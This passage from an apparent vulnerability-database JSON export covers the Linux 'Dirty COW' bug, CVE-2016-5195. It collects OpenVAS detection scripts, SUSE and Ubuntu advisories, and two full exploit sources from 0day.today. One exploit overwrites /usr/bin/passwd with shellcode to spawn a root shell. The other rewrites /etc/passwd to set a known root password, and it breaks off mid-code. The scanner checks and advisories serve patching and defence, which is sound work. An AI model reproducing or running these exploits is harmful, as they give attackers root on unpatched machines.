this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842925\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-10-21 05:54:07 +0200 (Fri, 21 Oct 2016)\");\n script_cve_id(\"CVE-2016-5195\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-raspi2 USN-3106-3\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-raspi2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that a race condition\n existed in the memory manager of the Linux kernel when handling copy-on-write\n breakage of private read-only memory mappings. A local attacker could use this\n to gain administrative privileges.\");\n script_tag(name:\"affected\", value:\"linux-raspi2 on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3106-3\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3106-3/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1029-raspi2\", ver:\"4.4.0-1029.36\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:49", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-10-21T00:00:00", "id": "OPENVAS:1361412562310842920", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842920", "title": "Ubuntu Update for linux USN-3104-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux USN-3104-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842920\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-10-21 05:54:02 +0200 (Fri, 21 Oct 2016)\");\n script_cve_id(\"CVE-2016-5195\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3104-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that a race condition\n existed in the memory manager of the Linux kernel when handling copy-on-write\n breakage of private read-only memory mappings. A local attacker could use this\n to gain administrative privileges.\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3104-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3104-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-113-generic\", ver:\"3.2.0-113.155\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-113-generic-pae\", ver:\"3.2.0-113.155\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-113-highbank\", ver:\"3.2.0-113.155\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-113-omap\", ver:\"3.2.0-113.155\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-113-powerpc-smp\", ver:\"3.2.0-113.155\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-113-powerpc64-smp\", ver:\"3.2.0-113.155\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-113-virtual\", ver:\"3.2.0-113.155\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-10-21T21:28:03", "bulletinFamily": "unix", "description": "The SUSE Linux Enterprise 12 GA LTSS kernel was updated to fix two issues.\n\n This security bug was fixed:\n\n - CVE-2016-5195: Local privilege escalation using MAP_PRIVATE. It is\n reportedly exploited in the wild (bsc#1004418).\n\n This non-security bug was fixed:\n\n - sched/core: Fix a race between try_to_wake_up() and a woken up task\n (bsc#1002165, bsc#1001419).\n\n", "modified": "2016-10-21T21:08:21", "published": "2016-10-21T21:08:21", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00039.html", "id": "SUSE-SU-2016:2593-1", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-10-22T01:27:52", "bulletinFamily": "unix", "description": "The SUSE Linux Enterprise 11 SP2 LTSS kernel was updated to fix one\n security issue.\n\n This security bug was fixed:\n\n - CVE-2016-5195: Local privilege escalation using MAP_PRIVATE. It is\n reportedly exploited in the wild (bsc#1004418).\n\n", "modified": "2016-10-22T00:10:22", "published": "2016-10-22T00:10:22", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00040.html", "id": "SUSE-SU-2016:2596-1", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-10-21T17:27:49", "bulletinFamily": "unix", "description": "The SUSE Linux Enterprise 11 SP4 kernel was updated to fix one security\n issue.\n\n This security bug was fixed:\n\n - CVE-2016-5195: Local privilege escalation using MAP_PRIVATE. It is\n reportedly exploited in the wild (bsc#1004418).\n\n", "modified": "2016-10-21T17:17:10", "published": "2016-10-21T17:17:10", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00036.html", "id": "SUSE-SU-2016:2585-1", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-10-27T01:27:51", "bulletinFamily": "unix", "description": "This update for the Linux Kernel 3.12.60-52_54 fixes several issues.\n\n The following security bugs were fixed:\n - CVE-2016-5195: A local privilege escalation using MAP_PRIVATE was fixed,\n which is reportedly exploited in the wild (bsc#1004419).\n\n", "modified": "2016-10-27T01:06:19", "published": "2016-10-27T01:06:19", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00065.html", "id": "SUSE-SU-2016:2657-1", "type": "suse", "title": "Security update for Linux Kernel Live Patch 15 for SLE 12 (important)", "cvss": {"score": 0.0, "vector": "NONE"}}], "ubuntu": [{"lastseen": "2019-05-29T19:20:51", "bulletinFamily": "unix", "description": "It was discovered that a race condition existed in the memory manager of the Linux kernel when handling copy-on-write breakage of private read-only memory mappings. A local attacker could use this to gain administrative privileges.", "modified": "2016-10-20T00:00:00", "published": "2016-10-20T00:00:00", "id": "USN-3104-2", "href": "https://usn.ubuntu.com/3104-2/", "title": "Linux kernel (OMAP4) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:22:17", "bulletinFamily": "unix", "description": "It was discovered that a race condition existed in the memory manager of the Linux kernel when handling copy-on-write breakage of private read-only memory mappings. A local attacker could use this to gain administrative privileges.", "modified": "2016-10-20T00:00:00", "published": "2016-10-20T00:00:00", "id": "USN-3105-1", "href": "https://usn.ubuntu.com/3105-1/", "title": "Linux kernel vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:22:22", "bulletinFamily": "unix", "description": "It was discovered that a race condition existed in the memory manager of the Linux kernel when handling copy-on-write breakage of private read-only memory mappings. A local attacker could use this to gain administrative privileges.", "modified": "2016-10-24T00:00:00", "published": "2016-10-24T00:00:00", "id": "USN-3107-2", "href": "https://usn.ubuntu.com/3107-2/", "title": "Linux kernel (Raspberry Pi 2) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:21:05", "bulletinFamily": "unix", "description": "It was discovered that a race condition existed in the memory manager of the Linux kernel when handling copy-on-write breakage of private read-only memory mappings. A local attacker could use this to gain administrative privileges.", "modified": "2016-10-20T00:00:00", "published": "2016-10-20T00:00:00", "id": "USN-3106-4", "href": "https://usn.ubuntu.com/3106-4/", "title": "Linux kernel (Qualcomm Snapdragon) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:22:14", "bulletinFamily": "unix", "description": "It was discovered that a race condition existed in the memory manager of the Linux kernel when handling copy-on-write breakage of private read-only memory mappings. A local attacker could use this to gain administrative privileges.", "modified": "2016-10-20T00:00:00", "published": "2016-10-20T00:00:00", "id": "USN-3106-1", "href": "https://usn.ubuntu.com/3106-1/", "title": "Linux kernel vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:20:46", "bulletinFamily": "unix", "description": "USN-3105-1 fixed vulnerabilities in the Linux kernel for Ubuntu 14.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 14.04 LTS for Ubuntu 12.04 LTS.\n\nIt was discovered that a race condition existed in the memory manager of the Linux kernel when handling copy-on-write breakage of private read-only memory mappings. A local attacker could use this to gain administrative privileges.", "modified": "2016-10-20T00:00:00", "published": "2016-10-20T00:00:00", "id": "USN-3105-2", "href": "https://usn.ubuntu.com/3105-2/", "title": "Linux kernel (Trusty HWE) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:20:47", "bulletinFamily": "unix", "description": "It was discovered that a race condition existed in the memory manager of the Linux kernel when handling copy-on-write breakage of private read-only memory mappings. A local attacker could use this to gain administrative privileges.", "modified": "2016-10-20T00:00:00", "published": "2016-10-20T00:00:00", "id": "USN-3106-3", "href": "https://usn.ubuntu.com/3106-3/", "title": "Linux kernel (Raspberry Pi 2) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:22:22", "bulletinFamily": "unix", "description": "It was discovered that a race condition existed in the memory manager of the Linux kernel when handling copy-on-write breakage of private read-only memory mappings. A local attacker could use this to gain administrative privileges.", "modified": "2016-10-20T00:00:00", "published": "2016-10-20T00:00:00", "id": "USN-3104-1", "href": "https://usn.ubuntu.com/3104-1/", "title": "Linux kernel vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:20:50", "bulletinFamily": "unix", "description": "It was discovered that a race condition existed in the memory manager of the Linux kernel when handling copy-on-write breakage of private read-only memory mappings. A local attacker could use this to gain administrative privileges.", "modified": "2016-10-20T00:00:00", "published": "2016-10-20T00:00:00", "id": "USN-3107-1", "href": "https://usn.ubuntu.com/3107-1/", "title": "Linux kernel vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-02-19T23:25:08", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category local exploits", "modified": "2016-10-22T00:00:00", "published": "2016-10-22T00:00:00", "href": "https://0day.today/exploit/description/25952", "id": "1337DAY-ID-25952", "type": "zdt", "title": "Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' Race Condition Privilege Escalation", "sourceData": "/*\r\n* (un)comment correct payload first (x86 or x64)!\r\n* \r\n* $ gcc cowroot.c -o cowroot -pthread\r\n* $ ./cowroot\r\n* DirtyCow root privilege escalation\r\n* Backing up /usr/bin/passwd.. to /tmp/bak\r\n* Size of binary: 57048\r\n* Racing, this may take a while..\r\n* /usr/bin/passwd is overwritten\r\n* Popping root shell.\r\n* Don't forget to restore /tmp/bak\r\n* thread stopped\r\n* thread stopped\r\n* [email\u00a0protected]:/root/cow# id\r\n* uid=0(root) gid=1000(foo) groups=1000(foo)\r\n*/\r\n \r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <sys/mman.h>\r\n#include <fcntl.h>\r\n#include <pthread.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n \r\nvoid *map;\r\nint f;\r\nint stop = 0;\r\nstruct stat st;\r\nchar *name;\r\npthread_t pth1,pth2,pth3;\r\n \r\n// change if no permissions to read\r\nchar suid_binary[] = \"/usr/bin/passwd\";\r\n \r\n/*\r\n* $ msfvenom -p linux/x64/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i\r\n*/\r\nunsigned char sc[] = {\r\n 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,\r\n 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0xb1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xea, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99,\r\n 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48,\r\n 0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8,\r\n 0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73,\r\n 0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05\r\n};\r\nunsigned int sc_len = 177;\r\n \r\n/*\r\n* $ msfvenom -p linux/x86/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i\r\nunsigned char sc[] = {\r\n 0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,\r\n 0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00,\r\n 0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,\r\n 0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52,\r\n 0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68,\r\n 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00,\r\n 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53,\r\n 0x89, 0xe1, 0xcd, 0x80\r\n};\r\nunsigned int sc_len = 136;\r\n*/\r\n \r\nvoid *madviseThread(void *arg)\r\n{\r\n char *str;\r\n str=(char*)arg;\r\n int i,c=0;\r\n for(i=0;i<1000000 && !stop;i++) {\r\n c+=madvise(map,100,MADV_DONTNEED);\r\n }\r\n printf(\"thread stopped\\n\");\r\n}\r\n \r\nvoid *procselfmemThread(void *arg)\r\n{\r\n char *str;\r\n str=(char*)arg;\r\n int f=open(\"/proc/self/mem\",O_RDWR);\r\n int i,c=0;\r\n for(i=0;i<1000000 && !stop;i++) {\r\n lseek(f,map,SEEK_SET);\r\n c+=write(f, str, sc_len);\r\n }\r\n printf(\"thread stopped\\n\");\r\n}\r\n \r\nvoid *waitForWrite(void *arg) {\r\n char buf[sc_len];\r\n \r\n for(;;) {\r\n FILE *fp = fopen(suid_binary, \"rb\");\r\n \r\n fread(buf, sc_len, 1, fp);\r\n \r\n if(memcmp(buf, sc, sc_len) == 0) {\r\n printf(\"%s is overwritten\\n\", suid_binary);\r\n break;\r\n }\r\n \r\n fclose(fp);\r\n sleep(1);\r\n }\r\n \r\n stop = 1;\r\n \r\n printf(\"Popping root shell.\\n\");\r\n printf(\"Don't forget to restore /tmp/bak\\n\");\r\n \r\n system(suid_binary);\r\n}\r\n \r\nint main(int argc,char *argv[]) {\r\n char *backup;\r\n \r\n printf(\"DirtyCow root privilege escalation\\n\");\r\n printf(\"Backing up %s.. to /tmp/bak\\n\", suid_binary);\r\n \r\n asprintf(&backup, \"cp %s /tmp/bak\", suid_binary);\r\n system(backup);\r\n \r\n f = open(suid_binary,O_RDONLY);\r\n fstat(f,&st);\r\n \r\n printf(\"Size of binary: %d\\n\", st.st_size);\r\n \r\n char payload[st.st_size];\r\n memset(payload, 0x90, st.st_size);\r\n memcpy(payload, sc, sc_len+1);\r\n \r\n map = mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);\r\n \r\n printf(\"Racing, this may take a while..\\n\");\r\n \r\n pthread_create(&pth1, NULL, &madviseThread, suid_binary);\r\n pthread_create(&pth2, NULL, &procselfmemThread, payload);\r\n pthread_create(&pth3, NULL, &waitForWrite, NULL);\r\n \r\n pthread_join(pth3, NULL);\r\n \r\n return 0;\r\n}\n\n# 0day.today [2018-02-19] #", "sourceHref": "https://0day.today/exploit/25952", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-01T03:11:30", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category local exploits", "modified": "2016-11-30T00:00:00", "published": "2016-11-30T00:00:00", "href": "https://0day.today/exploit/description/26446", "id": "1337DAY-ID-26446", "type": "zdt", "title": "Linux Kernel 2.6.22 < 3.9 - Dirty COW /proc/self/mem Race Condition Privilege Escalation (/etc/pa", "sourceData": "// EDB-Note: Compile: g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil\r\n// EDB-Note: Recommended way to run: ./dcow -s (Will automatically do \"echo 0 > /proc/sys/vm/dirty_writeback_centisecs\")\r\n//\r\n// -----------------------------------------------------------------\r\n// Copyright (C) 2016 Gabriele Bonacini\r\n//\r\n// This program is free software; you can redistribute it and/or modify\r\n// it under the terms of the GNU General Public License as published by\r\n// the Free Software Foundation; either version 3 of the License, or\r\n// (at your option) any later version.\r\n// This program is distributed in the hope that it will be useful,\r\n// but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n// GNU General Public License for more details.\r\n// You should have received a copy of the GNU General Public License\r\n// along with this program; if not, write to the Free Software Foundation,\r\n// Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA\r\n// -----------------------------------------------------------------\r\n \r\n#include <iostream>\r\n#include <fstream>\r\n#include <string>\r\n#include <thread>\r\n#include <sys/mman.h>\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <pwd.h>\r\n#include <pty.h>\r\n#include <string.h>\r\n#include <termios.h>\r\n#include <sys/wait.h>\r\n#include <signal.h>\r\n \r\n#define BUFFSIZE 1024\r\n#define PWDFILE \"/etc/passwd\"\r\n#define BAKFILE \"./.ssh_bak\"\r\n#define TMPBAKFILE \"/tmp/.ssh_bak\"\r\n#define PSM \"/proc/self/mem\"\r\n#define ROOTID \"root:\"\r\n#define SSHDID \"sshd:\"\r\n#define MAXITER 300\r\n#define DEFPWD \"$6$P7xBAooQEZX/ham$9L7U0KJoihNgQakyfOQokDgQWLSTFZGB9LUU7T0W2kH1rtJXTzt9mG4qOoz9Njt.tIklLtLosiaeCBsZm8hND/\"\r\n#define TXTPWD \"dirtyCowFun\\n\"\r\n#define DISABLEWB \"echo 0 > /proc/sys/vm/dirty_writeback_centisecs\\n\"\r\n#define EXITCMD \"exit\\n\"\r\n#define CPCMD \"cp \"\r\n#define RMCMD \"rm \"\r\n \r\nusing namespace std;\r\n \r\nclass Dcow{\r\n private:\r\n bool run, rawMode, opShell, restPwd;\r\n void *map;\r\n int fd, iter, master, wstat;\r\n string buffer, etcPwd, etcPwdBak,\r\n root, user, pwd, sshd;\r\n thread *writerThr, *madviseThr, *checkerThr;\r\n ifstream *extPwd;\r\n ofstream *extPwdBak;\r\n struct passwd *userId;\r\n pid_t child; \r\n char buffv[BUFFSIZE];\r\n fd_set rfds;\r\n struct termios termOld, termNew;\r\n ssize_t ign;\r\n \r\n void exitOnError(string msg);\r\n public:\r\n Dcow(bool opSh, bool rstPwd);\r\n ~Dcow(void);\r\n int expl(void); \r\n};\r\n \r\nDcow::Dcow(bool opSh, bool rstPwd) : run(true), rawMode(false), opShell(opSh), restPwd(rstPwd),\r\n iter(0), wstat(0), root(ROOTID), pwd(DEFPWD), sshd(SSHDID), writerThr(nullptr),\r\n madviseThr(nullptr), checkerThr(nullptr), extPwd(nullptr), extPwdBak(nullptr), \r\n child(0){ \r\n userId = getpwuid(getuid());\r\n user.append(userId->pw_name).append(\":\");\r\n extPwd = new ifstream(PWDFILE); \r\n while (getline(*extPwd, buffer)){\r\n buffer.append(\"\\n\");\r\n etcPwdBak.append(buffer);\r\n if(buffer.find(root) == 0){\r\n etcPwd.insert(0, root).insert(root.size(), pwd);\r\n etcPwd.insert(etcPwd.begin() + root.size() + pwd.size(), \r\n buffer.begin() + buffer.find(\":\", root.size()), buffer.end());\r\n }else if(buffer.find(user) == 0 || buffer.find(sshd) == 0 ){\r\n etcPwd.insert(0, buffer);\r\n }else{\r\n etcPwd.append(buffer);\r\n }\r\n }\r\n extPwdBak = new ofstream(restPwd ? TMPBAKFILE : BAKFILE);\r\n extPwdBak->write(etcPwdBak.c_str(), etcPwdBak.size());\r\n extPwdBak->close();\r\n fd = open(PWDFILE,O_RDONLY);\r\n map = mmap(nullptr, etcPwdBak.size(), PROT_READ,MAP_PRIVATE, fd, 0);\r\n}\r\n \r\nDcow::~Dcow(void){\r\n extPwd->close();\r\n close(fd);\r\n delete extPwd; delete extPwdBak; delete madviseThr; delete writerThr; delete checkerThr;\r\n if(rawMode) tcsetattr(STDIN_FILENO, TCSANOW, &termOld);\r\n if(child != 0) wait(&wstat); \r\n}\r\n \r\nvoid Dcow::exitOnError(string msg){\r\n cerr << msg << endl;\r\n // if(child != 0) kill(child, SIGKILL);\r\n throw new exception();\r\n}\r\n \r\nint Dcow::expl(void){\r\n madviseThr = new thread([&](){ while(run){ madvise(map, etcPwdBak.size(), MADV_DONTNEED);} });\r\n writerThr = new thread([&](){ int fpsm = open(PSM,O_RDWR); \r\n while(run){ lseek(fpsm, reinterpret_cast<off_t>(map), SEEK_SET); \r\n ign = write(fpsm, etcPwd.c_str(), etcPwdBak.size()); }\r\n });\r\n checkerThr = new thread([&](){ while(iter <= MAXITER){ \r\n extPwd->clear(); extPwd->seekg(0, ios::beg); \r\n buffer.assign(istreambuf_iterator<char>(*extPwd),\r\n istreambuf_iterator<char>());\r\n if(buffer.find(pwd) != string::npos && \r\n buffer.size() >= etcPwdBak.size()){\r\n run = false; break;\r\n }\r\n iter ++; usleep(300000);\r\n }\r\n run = false;\r\n });\r\n \r\n cerr << \"Running ...\" << endl;\r\n madviseThr->join();\r\n writerThr->join();\r\n checkerThr->join();\r\n \r\n if(iter <= MAXITER){ \r\n child = forkpty(&master, nullptr, nullptr, nullptr);\r\n \r\n if(child == -1) exitOnError(\"Error forking pty.\");\r\n \r\n if(child == 0){ \r\n execlp(\"su\", \"su\", \"-\", nullptr);\r\n exitOnError(\"Error on exec.\");\r\n }\r\n \r\n if(opShell) cerr << \"Password overridden to: \" << TXTPWD << endl;\r\n memset(buffv, 0, BUFFSIZE);\r\n ssize_t bytes_read = read(master, buffv, BUFFSIZE - 1);\r\n if(bytes_read <= 0) exitOnError(\"Error reading su prompt.\");\r\n cerr << \"Received su prompt (\" << buffv << \")\" << endl; \r\n \r\n if(write(master, TXTPWD, strlen(TXTPWD)) <= 0) \r\n exitOnError(\"Error writing pwd on tty.\");\r\n \r\n if(write(master, DISABLEWB, strlen(DISABLEWB)) <= 0) \r\n exitOnError(\"Error writing cmd on tty.\");\r\n \r\n if(!opShell){\r\n if(write(master, EXITCMD, strlen(EXITCMD)) <= 0) \r\n exitOnError(\"Error writing exit cmd on tty.\");\r\n }else{\r\n if(restPwd){\r\n string restoreCmd = string(CPCMD).append(TMPBAKFILE).append(\" \").append(PWDFILE).append(\"\\n\");\r\n if(write(master, restoreCmd.c_str(), restoreCmd.size()) <= 0) \r\n exitOnError(\"Error writing restore cmd on tty.\");\r\n restoreCmd = string(RMCMD).append(TMPBAKFILE).append(\"\\n\");\r\n if(write(master, restoreCmd.c_str(), restoreCmd.size()) <= 0) \r\n exitOnError(\"Error writing restore cmd (rm) on tty.\");\r\n }\r\n \r\n if(tcgetattr(STDIN_FILENO, &termOld) == -1 )\r\n exitOnError(\"Error getting terminal attributes.\");\r\n \r\n termNew = termOld;\r\n termNew.c_lflag &= static_cast<unsigned 